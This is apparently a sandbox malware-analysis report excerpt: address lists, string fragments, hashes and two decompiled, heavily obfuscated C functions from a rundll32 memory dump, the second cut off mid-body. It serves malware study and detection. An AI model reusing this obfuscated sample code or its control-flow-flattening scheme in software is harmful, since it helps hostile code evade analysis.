0x00b21ff8
0x00b22003
0x00b2200b
0x00b22018
0x00b2201b
0x00b2201f
0x00b22027
0x00b2202f
0x00b22037
0x00b2203f
0x00b22047
0x00b2204c
0x00b22054
0x00b2205f
0x00b2206a
0x00b22075
0x00b2208b
0x00b22092
0x00b2209d
0x00b220a8
0x00b220b0
0x00b220b8
0x00b220c0
0x00b220c8
0x00b220d0
0x00b220db
0x00b220e3
0x00b220ee
0x00b22100
0x00b22103
0x00b2210a
0x00b22115
0x00b22120
0x00b2212d
0x00b22138
0x00b22140
0x00b22145
0x00b2214a
0x00b22152
0x00b2215a
0x00b2215f
0x00b22167
0x00b2216f
0x00b2217a
0x00b22182
0x00b2218d
0x00b22198
0x00b221a0
0x00b221ab
0x00b221b6
0x00b221be
0x00b221c6
0x00b221ce
0x00b221d6
0x00b221de
0x00b221e6
0x00b221eb
0x00b221f3
0x00b221fb
0x00b22203
0x00b2220b
0x00b22213
0x00b2221b
0x00b22223
0x00b2222e
0x00b22243
0x00b22246
0x00b2224d
0x00b22258
0x00b22268
0x00b2226c
0x00b22274
0x00b2227c
0x00b22284
0x00b2228c
0x00b22291
0x00b22299
0x00b222a1
0x00b222a9
0x00b222b2
0x00b222b7
0x00b222bd
0x00b222c5
0x00b222cd
0x00b222d5
0x00b222da
0x00b222e7
0x00b222e8
0x00b222ec
0x00b222f4
0x00b22308
0x00b2230f
0x00b2231a
0x00b22325
0x00b22330
0x00b2233b
0x00b22343
0x00b2234b
0x00b22360
0x00b22365
0x00b2236b
0x00b22373
0x00b2237b
0x00b22388
0x00b2238b
0x00b2238f
0x00b22394
0x00b2239c
0x00b223a4
0x00b223ac
0x00b223b4
0x00b223bc
0x00b223c7
0x00b223cf
0x00b223da
0x00b223ed
0x00b223f4
0x00b223ff
0x00b22407
0x00b2240f
0x00b22417
0x00b2241f
0x00b22427
0x00b2242f
0x00b22437
0x00b2243f
0x00b22447
0x00b22457
0x00b2245b
0x00b22467
0x00b2246a
0x00b2246e
0x00b22476
0x00b22481
0x00b2248c
0x00b22497
0x00b224a2
0x00b224ad
0x00b224b8
0x00b224c3
0x00b224ce
0x00b224d9
0x00b224e1
0x00b224e6
0x00b224ee
0x00b224f6
0x00b224f6
0x00b224fe
0x00b224fe
0x00b224fe
0x00b224fe
0x00b22504
0x00000000
0x00000000
0x00b2250a
0x00b22686
0x00b22687
0x00b226a7
0x00b226b1
0x00b226b4
0x00b226b9
0x00b226c0
0x00b226c8
0x00000000
0x00b22510
0x00b22516
0x00b22620
0x00b22644
0x00b22657
0x00b22669
0x00b2266f
0x00b22677
0x00b22679
0x00b2267e
0x00000000
0x00b2251c
0x00b22522
0x00b225f6
0x00b225fa
0x00b225fb
0x00b22600
0x00b22606
0x00b22609
0x00b2260f
0x00000000
0x00b2260f
0x00b22528
0x00b2252a
0x00b225cf
0x00b225d5
0x00b225d8
0x00b225dd
0x00b225e0
0x00000000
0x00b22530
0x00b22536
0x00b225a0
0x00b225a5
0x00b225a6
0x00b225aa
0x00b225af
0x00b225b2
0x00000000
0x00b22538
0x00b2253e
0x00000000
0x00b22544
0x00b22567
0x00b2256d
0x00b2256d
0x00b22573
0x00b22578
0x00b2257d
0x00b2282d
0x00b22583
0x00b22583
0x00000000
0x00b22583
0x00b2257d
0x00b2253e
0x00b22536
0x00b2252a
0x00b22522
0x00b22516
0x00b22721
0x00b2272d
0x00b2272d
0x00b226d9
0x00b227fb
0x00b22802
0x00b22807
0x00b2280c
0x00b22818
0x00000000
0x00b2280e
0x00b2280e
0x00000000
0x00b2280e
0x00b226df
0x00b226e5
0x00b22796
0x00b2279b
0x00b2279c
0x00b227a0
0x00b227a5
0x00b227a8
0x00000000
0x00b226eb
0x00b226f1
0x00b22744
0x00b2275b
0x00b22761
0x00b22764
0x00b22769
0x00b22770
0x00b22778
0x00000000
0x00b226f3
0x00b226f9
0x00000000
0x00b226ff
0x00b2271a
0x00b22720
0x00b226f9
0x00b226f1
0x00b226e5
0x00000000
0x00b2281a
0x00b2281a
0x00000000

Strings

@, xrefs: 00B21F3B
uG$, xrefs: 00B223A4
t<, xrefs: 00B2201F
Cta, xrefs: 00B2212D
[, xrefs: 00B222F4
!C, xrefs: 00B2233B
jT#, xrefs: 00B2224D
0, xrefs: 00B224B8
HT3=, xrefs: 00B2221B
i<, xrefs: 00B22223
?h, xrefs: 00B21F7C
D9, xrefs: 00B22373
HW, xrefs: 00B22407
T1u:, xrefs: 00B220C8
3U, xrefs: 00B21EDE

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$jT#$t<$0$@$uG$
API String ID: 0-3043381779
Opcode ID: 5985def43a89196223a315d432d300f5ac9f9417f58abecf414268aeb36f0e23
Instruction ID: 13e023065d5c53cc3418aec8fbb248e42f83f1dd572ed5b032398405597ddd64
Opcode Fuzzy Hash: 5985def43a89196223a315d432d300f5ac9f9417f58abecf414268aeb36f0e23
Instruction Fuzzy Hash: CB4224725083819FE378CF25C98AA9BBBE1FBC4704F10891DE5D9962A0D7B59849CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B3511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B3511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00B32674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00B38C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00B28736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0xb3c7a0);
					_push(_v208);
					E00B27F4B(_t521, E00B3878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00B32025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E00B2EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E00B2B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E00B2EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E00B2B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0xb3c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E00B211C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E00B3878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00B32025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x00b3511b
0x00b3511b
0x00b35125
0x00b3512c
0x00b35133
0x00b3513b
0x00b35146
0x00b3514e
0x00b35156
0x00b3515e
0x00b35163
0x00b3516b
0x00b35176
0x00b3517e
0x00b35189
0x00b35191
0x00b35196
0x00b3519e
0x00b351a6
0x00b351ae
0x00b351b6
0x00b351be
0x00b351c3
0x00b351cb
0x00b351d0
0x00b351d8
0x00b351e0
0x00b351e9
0x00b351f2
0x00b351f7
0x00b351fd
0x00b35205
0x00b35218
0x00b3521b
0x00b3521e
0x00b35225
0x00b35230
0x00b35238
0x00b35240
0x00b35248
0x00b35250
0x00b35258
0x00b35260
0x00b35265
0x00b3526d
0x00b35275
0x00b35280
0x00b35288
0x00b35293
0x00b352a0
0x00b352a4
0x00b352b1
0x00b352b5
0x00b352bd
0x00b352c8
0x00b352d3
0x00b352de
0x00b352e6
0x00b352f0
0x00b352f4
0x00b352fc
0x00b35306
0x00b35312
0x00b35317
0x00b3531d
0x00b35322
0x00b3532a
0x00b35332
0x00b3533a
0x00b3533f
0x00b35344
0x00b3534c
0x00b35354
0x00b3535c
0x00b35361
0x00b35369
0x00b35371
0x00b35379
0x00b35381
0x00b3538b
0x00b3538e
0x00b35392
0x00b3539a
0x00b353a5
0x00b353b0
0x00b353bb
0x00b353c6
0x00b353ce
0x00b353d9
0x00b353e4
0x00b353ec
0x00b353f7
0x00b353ff
0x00b35407
0x00b3540f
0x00b35417
0x00b3541f
0x00b35427
0x00b3542f
0x00b3543c
0x00b35440
0x00b35445
0x00b3544d
0x00b35455
0x00b3545d
0x00b35465
0x00b3546d
0x00b35475
0x00b35480
0x00b35488
0x00b35493
0x00b3549b
0x00b354a3
0x00b354b0
0x00b354b4
0x00b354bc
0x00b354c8
0x00b354cd
0x00b354d3
0x00b354db
0x00b354e3
0x00b354eb
0x00b354f4
0x00b354f7
0x00b354fb
0x00b35503
0x00b3550b
0x00b35513
0x00b3551b
0x00b35525
0x00b35530
0x00b35538
0x00b35543
0x00b3554e
0x00b35559
0x00b35564
0x00b35573
0x00b3557a
0x00b3557e
0x00b35586
0x00b3558e
0x00b3559b
0x00b3559f
0x00b355a7
0x00b355af
0x00b355bc
0x00b355c8
0x00b355cf
0x00b355d3
0x00b355db
0x00b355e3
0x00b355eb
0x00b355f3
0x00b355fb
0x00b35603
0x00b35619
0x00b35620
0x00b3562b
0x00b3563e
0x00b35641
0x00b35648
0x00b35653
0x00b3565e
0x00b35666
0x00b35671
0x00b35687
0x00b3568e
0x00b35699
0x00b356a1
0x00b356ad
0x00b356b0
0x00b356b7
0x00b356bb
0x00b356c3
0x00b356d6
0x00b356dd
0x00b356e8
0x00b356f0
0x00b356f8
0x00b35700
0x00b35708
0x00b35710
0x00b35722
0x00b35848
0x00b3584d
0x00b35854
0x00b35857
0x00b3585c
0x00000000
0x00b3585c
0x00b3572e
0x00b35817
0x00b35821
0x00000000
0x00b35821
0x00b3573a
0x00b35806
0x00b3580d
0x00b357ea
0x00b357ea
0x00000000
0x00b357ea
0x00b35746
0x00b357c7
0x00b357c8
0x00b357d1
0x00b357d3
0x00b357d8
0x00b357da
0x00b35998
0x00b35998
0x00000000
0x00b35998
0x00b357e3
0x00b357e8
0x00b357e8
0x00000000
0x00b357e8
0x00b35748
0x00b3574e
0x00b3598c
0x00b3598c
0x00b35992
0x00000000
0x00000000
0x00000000
0x00b35992
0x00b35754
0x00b35759
0x00b35792
0x00b357ab
0x00000000
0x00b357b5
0x00b358a2
0x00b358a7
0x00b358b0
0x00b358c3
0x00b358ef
0x00b358f4
0x00b358f9
0x00b358fe
0x00b35913
0x00b3596b
0x00b3596b
0x00b35978
0x00b3597d
0x00b35984
0x00b35987
0x00000000

Strings

*T, xrefs: 00B353F7
|uQa, xrefs: 00B351D0
t:, xrefs: 00B35488
0), xrefs: 00B35189
r{, xrefs: 00B35275
OD, xrefs: 00B3562B
o^, xrefs: 00B35465
=i, xrefs: 00B3568E
%, xrefs: 00B35293
pv, xrefs: 00B358B0
y5, xrefs: 00B35493
'v, xrefs: 00B35417
c, xrefs: 00B356DD
p!,, xrefs: 00B35708

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: 511966b0b92816159a72be1e5eeb37e4fdda5e7f4fbb60fdedf1a27326422b8a
Instruction ID: 607cacd71c5de1527659763cda7073a2f8b06a542bad756830c5b12260f1fb1a
Opcode Fuzzy Hash: 511966b0b92816159a72be1e5eeb37e4fdda5e7f4fbb60fdedf1a27326422b8a
Instruction Fuzzy Hash: 43222371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D9962A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B24A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00B24A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
